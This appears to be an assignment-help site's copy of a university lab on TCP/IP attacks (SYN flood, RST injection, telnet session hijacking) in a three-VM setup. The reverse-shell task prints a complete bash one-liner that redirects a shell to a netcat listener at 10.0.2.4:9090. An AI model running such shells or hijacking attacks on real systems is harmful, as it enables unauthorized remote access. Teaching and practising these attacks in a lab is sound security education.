Creating reverse shell using tcp session hijacking

Assignment Help Computer Engineering
Reference no: EM132322708

1 Task Overview

The learning objective of this task is for students to gain first-hand experience on vulnerabilities, as well as on attacks against these vulnerabilities. Wise people learn from mistakes. In security education, we study mistakes that lead to software vulnerabilities. Studying mistakes from the past not only help students understand why systems are vulnerable, why a seemly-benign mistake can turn into a disaster, and why many security mechanisms are needed. More importantly, it also helps students learn the common patterns of vulnerabilities, so they can avoid making similar mistakes in the future. Moreover, using vulnerabilities as case studies, students can learn the principles of secure design, secure programming, and security testing. The vulnerabilities in the TCP/IP protocols represent a special genre of vulnerabilities in protocol de- signs and implementations; they provide an invaluable lesson as to why security should be designed in from the beginning, rather than being added as an afterthought. Moreover, studying these vulnerabilities help stu- dents understand the challenges of network security and why many network security measures are needed.

In this task, students need to conduct several attacks on the TCP protocol. This task covers the following topics:

• TCP SYN flood attack, and SYN cookies
• TCP reset attack
• TCP session hijacking attack
• Reverse shell

Task environment. This task has been tested on our pre-built Ubuntu 16.04 VM, which can be downloaded from the SEED website.

2 Task Environment
Network Setup. To conduct this task, students need to have at least 3 machines. One computer is used for attacking, the second computer is used as the victim, and the third computer is used as the observer. Students can set up 3 virtual machines on the same host computer, or they can set up 2 virtual machines, and then use the host computer as the third computer. For this task, we put all these three machines on the same LAN, the configuration is described in Figure 1.

152_figure.jpg

Figure 1: Environment Setup

Netwox Tools. We need tools to send out network packets of different types and with different contents. We can use Netwag to do that. However, the GUI interface of Netwag makes it difficult for us to auto- mate the process. Therefore, we strongly suggest students to use its command-line version, the Netwox command, which is the underlying command invoked by Netwag.

Netwox consists of a suite of tools, each having a specific number. You can run a command like following (the parameters depend on which tool you are using). For some of the tool, you have to run it with the root privilege:

$ sudo netwox number [parameters ... ]
If you are not sure how to set the parameters, you can look at the manual by issuing "netwox number
--help". You can also learn the parameter settings by running Netwag: for each command you execute from the graphic interface, Netwag actually invokes a corresponding Netwox command, and it displays the parameter settings. Therefore, you can simply copy and paste the displayed command.

Scapy Tool. Some of the tasks in this task can also be conducted using Scapy, which is a powerful interac- tive packet manipulation program. Scapy is very well maintained and is widely used; while Netwox is not being maintained any more. There are many online tutorials on Scapy; we expect students to learn how to use Scapy from those tutorials.

Tasks

In this task, students need to conduct attacks on the TCP/IP protocols. They can use the Netwox tools and/or other tools in the attacks. All the attacks are performed on Linux operating systems. However, instructors can require students to also conduct the same attacks on other operating systems and compare the observations.

To simplify the "guess" of TCP sequence numbers and source port numbers, we assume that attackers are on the same physical network as the victims. Therefore, you can use sniffer tools to get that information. The following is the list of attacks that need to be implemented.

Task 1: SYN Flooding Attack

1760_figure1.jpg

Figure 2: SYN Flooding Attack

SYN flood is a form of DoS attack in which attackers send many SYN requests to a victim's TCP port, but the attackers have no intention to finish the 3-way handshake procedure. Attackers either use spoofed IP address or do not continue the procedure. Through this attack, attackers can flood the victim's queue that is used for half-opened connections, i.e. the connections that has finished SYN, SYN-ACK, but has not yet gotten a final ACK back. When this queue is full, the victim cannot take any more connection. Figure 2 illustrates the attack.
The size of the queue has a system-wide setting. In Linux, we can check the setting using the following command:

$ sudo sysctl -q net.ipv4.tcp_max_syn_backlog
We can use command "netstat -na" to check the usage of the queue, i.e., the number of half- opened connection associated with a listening port. The state for such connections is SYN-RECV. If the 3-way handshake is finished, the state of the connections will be ESTABLISHED.

In this task, you need to demonstrate the SYN flooding attack. You can use the Netwox tool to conduct the attack, and then use a sniffer tool to capture the attacking packets. While the attack is going on, run the "netstat -na" command on the victim machine, and compare the result with that before the attack. Please also describe how you know whether the attack is successful or not.
The corresponding Netwox tool for this task is numbered 76. Here is a simple help screen for this tool.
You can also type "netwox 76 --help" to get the help information.

SYN Cookie Countermeasure: If your attack seems unsuccessful, one thing that you can investigate is whether the SYN cookie mechanism is turned on. SYN cookie is a defense mechanism to counter the SYN flooding attack. The mechanism will kick in if the machine detects that it is under the SYN flooding attack. You can use the sysctl command to turn on/off the SYN cookie mechanism:
$ sudo sysctl -a | grep cookie (Display the SYN cookie flag)
$ sudo sysctl -w net.ipv4.tcp_syncookies=0 (turn off SYN cookie)
$ sudo sysctl -w net.ipv4.tcp_syncookies=1 (turn on SYN cookie)
Please run your attacks with the SYN cookie mechanism on and off, and compare the results. In your report, please describe why the SYN cookie can effectively protect the machine against the SYN flooding attack. If your instructor does not cover the mechanism in the lecture, you can find out how the SYN cookie mechanism works from the Internet.

Note on Scapy: Although theoretically, we can use Scapy for this task, we have observed that the number of packets sent out by Scapy per second is much smaller than that by Netwox. This low rate makes it difficult for the attack to be successful. We were not able to succeed in SYN flooding attacks using Scapy.

Task 2: TCP RST Attacks on telnet and ssh Connections
The TCP RST Attack can terminate an established TCP connection between two victims. For example, if there is an established telnet connection (TCP) between two users A and B, attackers can spoof a RST packet from A to B, breaking this existing connection. To succeed in this attack, attackers need to correctly construct the TCP RST packet.

In this task, you need to launch an TCP RST attack to break an existing telnet connection between A and B. After that, try the same attack on an ssh connection. Please describe your observations. To simplify the task, we assume that the attacker and the victim are on the same LAN, i.e., the attacker can observe the TCP traffic between A and B.

Using Netwox. The corresponding Netwox tool for this task is numbered 78. Here is a simple help screen for this tool. You can also type "netwox 78 --help" to get the help information.
Listing 2: The usage of the Netwox Tool 78

Using Scapy. Please also use Scapy to conduct the TCP RST attack. A skeleton code is provided in the following:

Task 3: TCP RST Attacks on Video Streaming Applications

Let us make the TCP RST attack more interesting by experimenting it on the applications that are widely used in nowadays. We choose the video streaming application in this task. For this task, you can choose a video streaming web site that you are familiar with (we will not name any specific web site here). Most of video sharing websites establish a TCP connection with the client for streaming the video content. The attacker's goal is to disrupt the TCP session established between the victim and video streaming machine. To simplify the task, we assume that the attacker and the victim are on the same LAN. In the following, we describe the common interaction between a user (the victim) and some video-streaming web site:

• The victim browses for a video content in the video-streaming web site, and selects one of the videos for streaming.
• Normally video contents are hosted by a different machine, where all the video contents are located. After the victim selects a video, a TCP session will be established between the victim machine and the content server for the video streaming. The victim can then view the video he/she has selected.

Your task is to disrupt the video streaming by breaking the TCP connection between the victim and the content server. You can let the victim user browse the video-streaming site from another (virtual) machine or from the same (virtual) machine as the attacker. Please be noted that, to avoid liability issues, any attacking packets should be targeted at the victim machine (which is the machine run by yourself), not at the content server machine (which does not belong to you). You only need to use Netwox for this task.

Task 4: TCP Session Hijacking

984_figure2.jpg

Figure 3: TCP Session Hijacking Attack

The objective of the TCP Session Hijacking attack is to hijack an existing TCP connection (session) between two victims by injecting malicious contents into this session. If this connection is a telnet session, attackers can inject malicious commands (e.g. deleting an important file) into this session, causing the victims to execute the malicious commands. Figure 3 depicts how the attack works. In this task, you need to demonstrate how you can hijack a telnet session between two computers. Your goal is to get the the telnet server to run a malicious command from you. For the simplicity of the task, we assume that the attacker and the victim are on the same LAN.

Using Netwox. The corresponding Netwox tool for this task is numbered 40. Here is part of the manual for this tool. You can also type "netwox 40 --help" to get the full help information. You may also need to use Wireshark to find out the correct parameters for building the spoofed TCP packet.

You can use Wireshark to figure out what value you should put into each field of the spoofed TCP packets. It should be noted in the TCP session hijacking section of the SEED book, the command listed there does not set all the fields of the TCP and IP headers. The fields that are not set will use the default value provided by netwox. Those default values work for Ubuntu 12.04, but some of them do not work for Ubuntu 16.04. If you use the SEED book as a reference, you need to set those fields accordingly, instead of using the default. All the fields that need to be set are listed in Listing 3.

In the netwox command above, the tcp-data part only takes hex data. If we want to inject a command string, which is typically represented as a human-readable ASCII string, we need to convert it into a hex string. There are many ways to do that, but we will just use a very simple command in Python. In the following, we convert an ASCII string "Hello World" to a hex string (the quotation marks are not included).

Using Scapy. Please also use Scapy to conduct the TCP Session Hijacking attack.

Task 5: Creating Reverse Shell using TCP Session Hijacking

When attackers are able to inject a command to the victim's machine using TCP session hijacking, they are not interested in running one simple command on the victim machine; they are interested in running many commands. Obviously, running these commands all through TCP session hijacking is inconvenient. What attackers want to achieve is to use the attack to set up a back door, so they can use this back door to conveniently conduct further damages.

A typical way to set up back doors is to run a reverse shell from the victim machine to give the attack the shell access to the victim machine. Reverse shell is a shell process running on a remote machine, connecting back to the attacker's machine. This gives an attacker a convenient way to access a remote machine once it has been compromised.

In the following, we will show how we can set up a reverse shell if we can directly run a command on the victim machine (i.e. the server machine). In the TCP session hijacking attack, attackers cannot directly run a command on the victim machine, so their jobs is to run a reverse-shell command through the session hijacking attack. In this task, students need to demonstrate that they can achieve this goal.

1233_figure3.jpg

Figure 4: Reverse shell connection to the listening netcat process

To have a bash shell on a remote machine connect back to the attacker's machine, the attacker needs a process waiting for some connection on a given port. In this example, we will use netcat. This program allows us to specify a port number and can listen for a connection on that port. In Figure 4(a), netcat (nc for short) is used to listen for a connection on port 9090. In Figure 4(b), the /bin/bash command represents the command that would normally be executed on a compromised server. This command has the following pieces:
• "/bin/bash -i": i stands for interactive, meaning that the shell must be interactive (must provide a shell prompt)
• "> /dev/tcp/10.0.2.4/9090": This causes the output (stdout) of the shell to be redirected to the tcp connection to 10.0.2.4's port 9090. The output stdout is represented by file descriptor number 1.
• "0<&1": File descriptor 0 represents the standard input (stdin). This causes the stdin for the shell to be obtained from the tcp connection.

• "2>&1": File descriptor 2 represents standard error stderr. This causes the error output to be redirected to the tcp connection.

In summary, "/bin/bash -i > /dev/tcp/10.0.2.4/9090 0<&1 2>&1" starts a bash shell, with its input coming from a tcp connection, and its standard and error outputs being redirected to the same tcp connection. In Figure 4(a), when the bash shell command is executed on 10.0.2.8, it connects back to the netcat process started on 10.0.2.4. This is confirmed via the "Connection 10.0.2.8 accepted" message displayed by netcat.

The shell prompt obtained from the connection is now connected to the bash shell. This can be ob- served from the difference in the current working directory (printed via pwd). Before the connection was established, the pwd returned /home/seed. Once netcat is connected to bash, pwd in the new shell returns /home/seed/Documents (directory corresponding to where /bin/bash is started from). We can also observe the IP address displayed in the shell prompt is also changed to 10.0.2.8, which is the same as that on the server machine. The output from netstat shows the established connection.

The description above shows how you can set up a reverse shell if you have the access to the target machine, which is the telnet server in our setup, but in this task, you do not have such an access. Your task is to launch an TCP session hijacking attack on an existing telnet session between a user and the target server. You need to inject your malicious command into the hijacked session, so you can get a reverse shell on the target server. You can use either Netwox or Scapy for this task (using Scapy is more convenient).

• You should submit a task report. The report should cover the following sections:

• Design: The design of your attacks, including the attacking strategies, the packets that you use in your attacks, the tools that you used, etc.
• Observation and Explanation: Is your attack successful? How do you know whether it has suc- ceeded or not? What do you expect to see? What have you observed? Is the observation a surprise to you?

Attachment:- TCP_Attacks.rar

Reference no: EM132322708

Questions Cloud

Current regulations and customer contracts : It is true that businesses engage in security efforts to protect their assets and comply with current regulations and customer contracts?
Determining the maximum area of a field : Determining the maximum area of a field you could create with a collection of 15 fence sections, each eight feet in length.
Basic components required to set up type of network : Assume you want to set up a simple network that allows two or more PCs to share files. You also want these PCs to be able to access the public Internet.
Write a philosophy of youth ministry : The biblical and theological concepts that shape your youth ministry Scholars, research or authors that influence and inform your youth ministry.
Creating reverse shell using tcp session hijacking : HS3011 - Information Security - Holmes Institute - Creating Reverse Shell using TCP Session Hijacking - conduct attacks on the TCP/IP protocols.
Find the discount applicable using nested if-else : Given GENDER (1 for male and 0 for female) and AGE of a person, find the discount applicable using nested if-else statements. Use c programming language
Write a review and analysis of this childrens classic : Analyze your textbook assigned theory into your response or analysis of this children's classic. Rview Thumbelina in terms of TYPES of CONFLICT .
Implementation of new it-based business strategies : What are several change management solutions for end-user resistance to the implementation of new IT-based business strategies and applications?
Office setting and its benefits : Explain wired and wireless in an office setting and its benefits.

Reviews

Write a Review

Computer Engineering Questions & Answers

  Write a void function named sort with two args

Write a C Program: Using qsort, write a void function named sort with 2 args an unsigned that is the number of elements in the array.

  Questioncreate a set of in third normal form 3nf from

questioncreate a set of in third normal form 3nf from following un-normalised relation. you must use finkelstein

  Construct a truth table and find minimized boolean function

Construct a truth table and find the minimized Boolean function to implement the logic telling the CSU staff when to approve. Draw a circuit diagram for the Boolean function.

  Questionwrite down python program that will read list of

questionwrite down python program that will read list of temperatures from a data file you created called tempfile.txt

  At which layer would you implement that protocol

Suppose you wanted to implement a new routing protocol in the SDN control plane. At which layer would you implement that protocol? Explain.

  Scripts_new directory and dir.txt file

Write down the following folder structure on C: drive of your computer: Scripts_New, Networking, User.

  Define use of blockchain for protection of medical records

Discuss in 500 words or more the use of blockchain for the protection of one of medical, financial, or educational records. Provide a URL for your citations.

  Decision making systems

How we may leverage business intelligent to generate meaningful information and decision making systems in order to help the keep cost and the profits.

  What is meant cisc machines versus risc machines

Discuss what is meant CISC machines versus RISC machines.

  Discuss new information technology has a ripple effect

The introduction of new information technology has a ripple effect, raising new ethical, social, and political issues that must be dealt with on individual

  Two different recent operating system security patches and

write a report of around 3500 words that coversthe type of organisations and communities that contribute to resources

  Create a random interimage transition by storing

Using HTML and canvas, create a random interimage transition by storing the new screen image in an offscreen buffer and randomly copying pixels from it to the display area, overlaying the pixels already at those locations.

Free Assignment Quote

Assured A++ Grade

Get guaranteed satisfaction & time on delivery in every assignment order you paid with us! We ensure premium quality solution document along with free turntin report!

All rights reserved! Copyrights ©2019-2020 ExpertsMind IT Educational Pvt Ltd